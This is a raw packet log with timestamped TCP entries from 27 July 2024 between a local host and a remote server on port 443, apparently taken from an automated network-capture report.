Jul 27, 2024 07:44:03.676589012 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.676604986 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.676613092 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.676640987 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.677084923 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.677136898 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.677159071 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.677165031 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.677191973 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.677203894 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.677512884 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.677557945 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.677578926 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.677584887 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.677603006 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.677622080 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.677814960 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.677856922 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.677874088 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.677881002 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.677903891 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.677918911 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.815149069 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.815207958 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.815324068 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.815325975 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.815324068 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.815360069 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.815393925 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.815407991 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.815419912 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.815431118 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.815463066 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.815471888 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.815715075 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.815752983 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.815773010 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.815785885 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.815798998 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.815824032 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.816365957 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.816385984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.816423893 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.816431046 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.816462040 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.816483974 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.817075014 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.817095041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.817162991 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.817168951 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.817213058 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.817492962 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.817513943 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.817547083 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.817552090 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.817591906 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.817605972 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.818017960 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.818080902 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.818376064 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.818429947 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.818454027 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.818473101 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.818532944 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.818538904 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.818600893 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.819303036 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.851274967 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.851331949 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.851486921 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.851486921 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.851510048 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.851721048 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.956536055 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.956598043 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.956614017 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.956629992 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.956660032 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.956670046 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.956768990 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.956820965 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.956830978 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.956849098 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.956870079 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.956881046 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.956973076 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.957017899 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.957041025 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.957046986 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.957062960 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.957082033 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.957531929 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.957575083 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.957595110 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.957601070 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.957629919 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.957642078 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.957849026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.957904100 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.957921028 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.957927942 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.957945108 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.957958937 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.958398104 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.958442926 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.958466053 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.958472013 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.958497047 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.958508968 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.958787918 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.958832026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.958846092 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.958854914 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.958884954 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.958895922 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.959189892 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.959239960 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.959256887 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.959270954 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:03.959295988 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.959311962 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:03.959619999 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.005310059 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.005369902 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.005521059 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.005521059 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.005548000 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.005778074 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.043768883 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.043823957 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.043843985 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.043863058 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.043875933 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.043895006 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.096951962 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.096997976 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.097023964 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.097045898 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.097059011 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.097146988 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.097203970 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.097215891 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.097215891 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.097237110 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.097254992 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.097280979 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.098081112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.098125935 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.098144054 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.098153114 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.098179102 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.098187923 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.098382950 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.098423958 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.098440886 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.098448038 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.098459959 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.098484039 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.098822117 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.098864079 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.098877907 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.098886013 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.098913908 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.098926067 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.099160910 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.099210024 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.099220991 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.099239111 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.099261045 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.099270105 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.100204945 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.100244999 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.100275993 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.100282907 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.100311041 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.100322008 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.131452084 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.131490946 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.131526947 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.131541967 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.131556034 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.131577015 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.184767008 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.184808969 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.184957027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.184957027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.184978962 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.185050011 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.185097933 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.185169935 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.185169935 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.185169935 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.185192108 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.185391903 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.238405943 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.238461971 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.238600969 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.238601923 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.238601923 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.238634109 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.238815069 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.239063978 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.239105940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.239213943 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.239213943 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.239237070 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.239794016 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.239842892 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.239878893 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.239886999 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.239912987 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.240087032 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.240124941 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.240158081 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.240164042 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.240180969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.240180969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.240452051 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.240515947 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.240523100 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.241067886 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.241132975 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.241141081 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.272814035 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.272871017 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.272996902 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.272996902 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.273021936 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.273046017 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.273092985 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.273221970 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.273221970 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.273241997 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.318492889 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.325988054 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.326030016 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.326162100 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.326162100 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.326174974 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.326205015 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.326251984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.326370001 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.326370001 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.326370001 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.326395035 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.326436996 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.379147053 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.379173994 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.379252911 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.379277945 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.379317999 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.379393101 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.379410982 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.379441023 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.379446983 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.379467010 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.379479885 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.381695986 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.381721020 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.381778002 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.381783009 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.381822109 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.382199049 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.382220984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.382272005 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.382277012 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.382293940 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.382314920 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.382544041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.382565022 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.382603884 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.382611036 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.382642984 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.382879972 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.382900953 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.382931948 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.382937908 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.382961035 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.382976055 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.383200884 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.383219957 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.383249998 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.383255959 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.383280993 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.383295059 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.414370060 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.414428949 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.414556026 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.414556026 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.414575100 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.414603949 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.414654016 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.414729118 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.414729118 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.414729118 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.414752960 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.414797068 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.467329025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.467371941 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.467505932 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.467505932 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.467525959 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.467544079 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.467573881 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.467583895 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.467611074 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.467632055 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.467633009 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.467655897 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.467684984 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.467700005 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.520422935 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.520467997 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.520647049 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.520647049 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.520668983 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.520690918 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.520714045 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.520721912 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.520746946 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.520761967 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.520771027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.520788908 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.520822048 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.520843029 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.521173000 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.521210909 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.521236897 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.521243095 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.521255016 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.521276951 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:04.521501064 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:04.521543026 CEST	443	62252	185.149.100.242	192.168.2.4
